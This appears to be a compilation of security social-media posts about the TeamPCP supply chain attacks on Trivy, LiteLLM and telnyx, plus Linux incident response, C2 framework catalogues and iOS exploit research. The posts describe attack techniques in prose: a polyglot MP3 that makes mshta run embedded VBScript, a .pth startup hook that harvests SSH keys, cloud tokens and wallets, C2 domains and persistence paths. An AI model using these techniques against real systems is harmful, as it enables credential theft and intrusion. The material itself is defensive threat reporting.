Ahmet Payaslıoğlu

Just put your vbscript inside of html and put that inside of an mp3 in the middle of some frame data and mshta will just... Fucking execute it?!?!

Linux Incident Response (IR) gap Every SOC handles Linux servers. Most SOC analysts only know Windows forensics. When an incident hits a Linux host, the investigation stalls. Teams check auth.log for SSH brute force and stop there. Meanwhile, the attacker's systemd persistence service is running, their cron job re-downloads the implant every 15 minutes, and bash_history is empty because they ran "unset HISTFILE" as their first command. The evidence is in journald, auditd EXECVE records, and filesystem metadata that attackers can't fake without raw disk access. But you have to know where to look. We have built a Linux IR course that teaches the full investigation methodology — filesystem forensics, log analysis, memory forensics, container escape, and cloud lateral movement. The first 2 are free; no account needed. Training material: training.ridgelinecyber.com/courses/practi…

We open sourced the tool used to detect the Axios supply chain compromise! I built it Friday after a red eye home from RSAC. Also, wrote up the full story, including the hectic moments after that first critical alert github.com/elastic/supply…

Part of TeamPCP's success thus far has been the speed in which they operate. tl;dr teampcp doing lots of supply chains, exhausting, smash and grab passwords, runaway, really tiring Generally speaking, large scale supply chain attacks are quiet with the focus being silence and espionage. A notable example of this is SOLARWINDS supply-chain attack which was conducted by the Russian Federation. The goal is to discretely insert malicious code into a products update cycle. The payload would (under ideal circumstances) execute with specific triggers in place and BE QUIET. They don't want to set off any metaphorical alarms. You quietly watch and SLOWLY work. TeamPCP (as of this writing) has focused on information exfiltration (stealing sensitive data, primarily credentials) which is more akin to a smash-and-grab rather staying silent and watching what people are doing with their binoculars. A successful supply chain attack can be a DFIR (Digital Forensics and Incident Response) nightmare. Many organizations do not have an internal DFIR on staff, hence they consult with external entities. Suddenly with a supply chain attack you've got dozens of organizations contacting the same group of companies needing a forensic investigation launched. These DFIR's can take time with reporting, identifying victims, potential PII or sensitive documents stolen, cooperation with law enforcement and legal departments (or external law firms) ... it can take days, weeks, or (depending on the scope of impact and bureaucracy) months. And then suddenly there is another supply chain attack ... and then another ... and then another ... and then another ... with a total of 50 as of this writing. The best I can describe what I'm currently seeing is a "DFIR resource exhaustion" technique. If you've got only a handful of DFIR firms spread thin across a dozen of so companies and then ANOTHER supply chain attack happens AND THEN ANOTHER AND THEN ANOTHER, with some organizations potentially being hit multiple times, it's a nightmare come alive. TeamPCP (as of what we've learned thus far) successfully used a supply chain attack to pivot to other supply chain attacks. They're chaining chains. The concern now is they've performed 50 supply chain attacks in 8 days. Is there anymore coming? Has any other vendor failed to rotate their security credentials correctly? Is any company not cooperating? What data was stolen? How many companies are even impacted? How many are unaware of what happened? How much user PII was stolen? How were these other supply chain attacks conducted? The current prevailing theory is all of these supply chain attacks are the result of the initial Trivy supply chain attack, however (unironically) DFIR work must be conducted and more investigative work needs to be performed. It is dangerously to assert with high-confidence it is the result of the Trivy supply chain attack. If you're wrong, what if it's from something else we're not aware of yet? I'm sure not all details are public (yet). More information will come out eventually. This sort of DFIR work would take months but now it's a race against the clock hoping another doesn't occur. 2026 starting off strong.

😼New TeamPCP: PyPI package "telnyx" versions 4.87.1 and 4.87.2 contain malware. These versions were uploaded directly to PyPI (no matching GitHub tags/releases). Downgrade to 4.87.0 or earlier immediately. Windows payload appears broken in 4.87.1.

Someone just poisoned the Python package that manages AI API keys for NASA, Netflix, Stripe, and NVIDIA.. 97 million downloads a month.. and a simple pip install was enough to steal everything on your machine. The attacker picked the one package whose entire job is holding every AI credential in the organization in one place. OpenAI keys, Anthropic keys, Google keys, Amazon keys… all routed through one proxy. All compromised at once. The poisoned version was published straight to PyPI.. no code on GitHub.. no release tag.. no review. Just a file that Python runs automatically on startup. You didn’t need to import it. You didn’t need to call it. The malware fired the second the package existed on your machine. The attacker vibe coded it… the malware was so sloppy it crashed computers.. used so much RAM a developer noticed their machine dying and investigated. They found LiteLLM had been pulled in through a Cursor MCP plugin they didn’t even know they had. That crash is the only reason thousands of companies aren’t fully exfiltrated right now. If the code had been cleaner nobody notices for weeks. Maybe months. The attack chain is the part that gets worse every sentence. TeamPCP compromised Trivy first. A security scanning tool. On March 19. LiteLLM used Trivy in its own CI pipeline… so the credentials stolen from the SECURITY product were used to hijack the AI product that holds all your other credentials. Then they hit GitHub Actions. Then Docker Hub. Then npm. Then Open VSX. Five package ecosystems in two weeks. Each breach giving them the credentials to unlock the next one. The payload was three stages.. harvest every SSH key, cloud token, Kubernetes secret, crypto wallet, and .env file on the machine.. deploy privileged containers across every node in the cluster.. install a persistent backdoor waiting for new instructions. TeamPCP posted on Telegram after: “Many of your favourite security tools and open-source projects will be targeted in the months to come.. stay tuned.” Every AI agent, copilot, and internal tool your company shipped this year runs on hundreds of packages exactly like this one… nobody chose to install LiteLLM on that developer’s machine. It came in as a dependency of a dependency of a plugin. One compromised maintainer account turned the entire trust chain into a credential harvesting operation across thousands of production environments in hours. The companies deploying AI the fastest right now have the least visibility into what’s underneath it.

⚠️ LiteLLM Supply Chain Poisoning Attack Analysis LiteLLM is a widely used open-source Python library and proxy server in the AI ecosystem, with over 97M monthly downloads. It is commonly used to unify API calls across hundreds of LLMs. The attacker group TeamPCP took over the project’s release pipeline and published malicious versions (1.82.7 and 1.82.8) to PyPI, embedding credential theft and backdoor functionality. 【1】Background and Attack Path This is not an isolated incident, but part of a broader campaign by TeamPCP targeting “trusted security infrastructure”. The attack chain is as follows. Initial compromise (Trivy breach). Around March 19, the attackers compromised the GitHub Action of Aqua Security’s vulnerability scanner Trivy. Credential theft. LiteLLM used the compromised Trivy in its CI/CD pipeline for security scanning. During execution, the malicious Trivy Action successfully exfiltrated the PyPI publish token (PYPI_PUBLISH token) from the LiteLLM environment. Malicious release. Using the stolen token, the attackers bypassed the project’s GitHub release workflow and directly pushed malicious versions 1.82.7 and 1.82.8 to the PyPI repository on March 24. 【2】Attack Mechanism and Malicious Behavior This attack demonstrates extremely high stealth and impact. The two malicious versions use different trigger mechanisms. Trigger mechanism Version 1.82.7 (stealth import trigger). Attackers injected obfuscated base64 malicious code into litellm/proxy/proxy_server.py. The payload is only activated when the LiteLLM proxy is explicitly executed, or when litellm.proxy is imported. Version 1.82.8 (.pth hijacking trigger). Attackers introduced a relatively new attack vector in PyPI poisoning, Python startup hooks. A file named litellm_init.pth is placed in the site-packages directory. During Python initialization, the built-in site module automatically loads all .pth files and executes any line starting with import. As long as the malicious package is installed, any Python process on the system will trigger the payload, including running scripts, tests, or simply entering the Python interactive shell. Note: The attack was discovered because the malicious process continuously spawned Python subprocesses, causing an infinite loop that led to memory exhaustion (Fork Bomb). Malicious payload execution Once triggered, the malicious script performs the following actions. Stage 1: Data harvesting. The malware scans and collects high-value sensitive information on the host, including but not limited to cloud credentials (AWS, GCP, Azure) and Kubernetes tokens. It also collects .env files (which often contain AI API keys and database passwords), developer credentials such as ~/.ssh and ~/.gitconfig, and crypto wallets including Bitcoin, Ethereum, Monero, and Dogecoin configurations and private keys. Stage 2: Encryption and exfiltration. All collected data is encrypted using 4096-bit RSA and AES-256-CBC, packaged into a tar archive, and exfiltrated via POST requests to attacker-controlled C2 domains such as models.litellm[.]cloud (and earlier checkmarx[.]zone). Stage 3: Persistence. A persistent backdoor is written to ~/.config/sysmon/sysmon.py on Linux systems, and an accompanying systemd service is created to maintain long-term control. If a Kubernetes Service Account Token is found, the malware attempts to read all Secrets across namespaces in the cluster, and may even try to deploy a privileged Alpine Pod in the kube-system namespace to take over the entire node. 【3】Impact Scope Direct victims include users who installed or updated LiteLLM via pip install litellm between March 24 08:30 UTC and 11:25 UTC without version pinning. Indirect victims include many AI Agent frameworks, MCP server components (such as Cursor-related plugins), and LLM orchestration tools that rely on LiteLLM as a dependency. If CI/CD pipelines or Docker image builds pulled the malicious versions due to lack of strict version pinning, production environments may be compromised. 【4】GoPlus Security Recommendations If your systems were running AI-related Python environments during this period, take immediate action. Risk investigation. Check all hosts, Docker images, and CI/CD pipelines to determine whether LiteLLM versions 1.82.7 or 1.82.8 were installed. You can verify using pip show litellm. Check for backdoor indicators such as litellm_init.pth, ~/.config/sysmon/sysmon.py, and any suspicious systemd services. Containment and remediation. Immediately isolate infected machines or Kubernetes nodes. Do not rely on uninstalling the package. It is recommended to destroy affected containers or instances and rebuild them from scratch. Credential rotation. Revoke and rotate all potentially exposed sensitive data, including API keys, access keys, and SSH keys.

- XZ utils backdoor: found by guy debugging 200ms latency - LiteLLM hack: found by guy debugging oom issue These could have been the most impactful compromises ever. Forget security vendors, weaponize your engineers’ autism.

#ClaudeForBlueTeam - Day 9! Claude + tshark + Obsidian = analyzing PCAP like we're living in the future 😎 One prompt and your PCAP is analyzed and mapped to ATT&CK - all the tshark commands are included too, so you can sanity check Claude's work.

For those of you playing around at home with the LiteLLM supply chain stuff. Here are the decoded payloads and other info. github.com/HackingLZ/lite…

LiteLLM? Sysmon 🤣

LiteLLM HAS BEEN COMPROMISED, DO NOT UPDATE. We just discovered that LiteLLM pypi release 1.82.8. It has been compromised, it contains litellm_init.pth with base64 encoded instructions to send all the credentials it can find to remote server + self-replicate. link below

Software horror: litellm PyPI supply chain attack. Simple `pip install litellm` was enough to exfiltrate SSH keys, AWS/GCP/Azure creds, Kubernetes configs, git credentials, env vars (all your API keys), shell history, crypto wallets, SSL private keys, CI/CD secrets, database passwords. LiteLLM itself has 97 million downloads per month which is already terrible, but much worse, the contagion spreads to any project that depends on litellm. For example, if you did `pip install dspy` (which depended on litellm>=1.64.0), you'd also be pwnd. Same for any other large project that depended on litellm. Afaict the poisoned version was up for only less than ~1 hour. The attack had a bug which led to its discovery - Callum McMahon was using an MCP plugin inside Cursor that pulled in litellm as a transitive dependency. When litellm 1.82.8 installed, their machine ran out of RAM and crashed. So if the attacker didn't vibe code this attack it could have been undetected for many days or weeks. Supply chain attacks like this are basically the scariest thing imaginable in modern software. Every time you install any depedency you could be pulling in a poisoned package anywhere deep inside its entire depedency tree. This is especially risky with large projects that might have lots and lots of dependencies. The credentials that do get stolen in each attack can then be used to take over more accounts and compromise more packages. Classical software engineering would have you believe that dependencies are good (we're building pyramids from bricks), but imo this has to be re-evaluated, and it's why I've been so growingly averse to them, preferring to use LLMs to "yoink" functionality when it's simple enough and possible.

👁️ LOLC2 Collection of C2 frameworks abusing legitimate services to evade detection Major update: new projects tested, enriched data, and deeper insights. site: lolc2.github.io github: github.com/lolc2/lolc2.gi…

Google Threat Intelligence Group, Lookout & iVerify have identified DarkSword - a new iOS full-chain exploit using multiple 0-days to fully compromise devices - that's been deployed by commercial surveillance vendors & suspected state-sponsored actors. cloud.google.com/blog/topics/th…

Threat Actors are "Bringing Their Own Forensics" In a recent ClickFix campaign, we saw threat actors likely related to Interlock Ransomware, running Volatility (vol.py) directly on victim machines. Commonly a tool for defenders, the TAs are using it to:

#ESETresearch analyzed more than 80 EDR killers, seen across real-world intrusions, and used ESET telemetry to document how these tools operate, who uses them, and how they evolve beyond simple driver abuse. welivesecurity.com/en/eset-resear… 1/6

Using LLM and Ghidra to analyze malware (Part 1) discounttimu.substack.com/p/using-llm-an…